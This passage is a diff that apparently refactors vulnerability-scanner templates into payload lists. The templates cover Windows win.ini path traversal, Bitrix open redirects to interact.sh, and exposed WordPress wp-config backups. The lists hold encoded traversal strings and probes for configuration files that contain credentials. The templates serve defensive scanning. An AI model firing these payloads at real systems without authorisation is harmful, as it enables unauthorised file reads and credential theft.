-      - "{{BaseURL}}/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
-      - "{{BaseURL}}/../../../../../../../../../windows/win.ini"
-      - "{{BaseURL}}/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini"
+        - "/./../../../../../../../../../../windows/win.ini"
+        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini"
+        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini"
+        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini"
+        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini"
+        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
+        - "/?redirect=..%2f..%2f..%2f..%2fwindows/win.ini"
+        - "/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+        - "/?url=..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini"
+        - "/..///////..////..//////windows/win.ini"
+        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini"
+        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini"
+        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00"
+        - "/index.php?page=windows/win.ini"
+        - "/index.php?page=windows/win.ini%00"
+        - "/index.php?page=../../windows/win.ini"
+        - "/index.php?page=....//....//windows/win.ini"
+        - "/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini"
+        - "/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini"
+        - "/../../../../../../../../../windows/win.ini"
+        - "/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini"
 
     stop-at-first-match: true
     matchers:

http/vulnerabilities/other/bitrix-open-redirect.yaml

@@ -19,20 +19,23 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/bitrix/rk.php?goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
-      - '{{BaseURL}}/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/'
-      - '{{BaseURL}}/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/'
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - '/bitrix/rk.php?goto=https://interact.sh'
+        - '/bitrix/redirect.php?event1=&event2=&event3=&goto=https://interact.sh'
+        - '/bitrix/redirect.php?event3=352513&goto=https://interact.sh'
+        - '/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://interact.sh'
+        - '/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://interact.sh'
+        - '/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://interact.sh'
+        - '/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://interact.sh'
+        - '/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://interact.sh'
+        - '/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
+        - '/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
+        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
+        - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
+        - '/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/'
+        - '/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/'
 
     stop-at-first-match: true
 

http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml

@@ -16,36 +16,39 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-config.php'
-      - '{{BaseURL}}/.wp-config.php.swp'
-      - '{{BaseURL}}/wp-config-sample.php'
-      - '{{BaseURL}}/wp-config.inc'
-      - '{{BaseURL}}/wp-config.old'
-      - '{{BaseURL}}/wp-config.txt'
-      - '{{BaseURL}}/wp-config.php.txt'
-      - '{{BaseURL}}/wp-config.php.bak'
-      - '{{BaseURL}}/wp-config.php.BAK'
-      - '{{BaseURL}}/wp-config.php.old'
-      - '{{BaseURL}}/wp-config.php.OLD'
-      - '{{BaseURL}}/wp-config.php.dist'
-      - '{{BaseURL}}/wp-config.php.inc'
-      - '{{BaseURL}}/wp-config.php.swp'
-      - '{{BaseURL}}/wp-config.php.html'
-      - '{{BaseURL}}/wp-config-backup.txt'
-      - '{{BaseURL}}/wp-config.php.save'
-      - '{{BaseURL}}/wp-config.php.SAVE'
-      - '{{BaseURL}}/wp-config.php~'
-      - '{{BaseURL}}/wp-config.php-backup'
-      - '{{BaseURL}}/wp-config.php.orig'
-      - '{{BaseURL}}/wp-config.php_orig'
-      - '{{BaseURL}}/wp-config.php.original'
-      - '{{BaseURL}}/wp-config.backup'
-      - '{{BaseURL}}/_wpeprivate/config.json'
-      - '{{BaseURL}}/config.php.zip'
-      - '{{BaseURL}}/config.php.tar.gz'
-      - '{{BaseURL}}/config.php.new'
-      - '{{BaseURL}}/common/config.php.new'
-      - '{{BaseURL}}/wp-config.php.bk'
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/wp-config.php"
+        - "/.wp-config.php.swp"
+        - "/wp-config-sample.php"
+        - "/wp-config.inc"
+        - "/wp-config.old"
+        - "/wp-config.txt"
+        - "/wp-config.php.txt"
+        - "/wp-config.php.bak"
+        - "/wp-config.php.BAK"
+        - "/wp-config.php.old"
+        - "/wp-config.php.OLD"
+        - "/wp-config.php.dist"
+        - "/wp-config.php.inc"
+        - "/wp-config.php.swp"
+        - "/wp-config.php.html"
+        - "/wp-config-backup.txt"
+        - "/wp-config.php.save"
+        - "/wp-config.php.SAVE"
+        - "/wp-config.php~"
+        - "/wp-config.php-backup"
+        - "/wp-config.php.orig"
+        - "/wp-config.php_orig"
+        - "/wp-config.php.original"
+        - "/wp-config.backup"
+        - "/_wpeprivate/config.json"
+        - "/config.php.zip"
+        - "/config.php.tar.gz"
+        - "/config.php.new"
+        - "/common/config.php.new"
+        - "/wp-config.php.bk"
 
     stop-at-first-match: true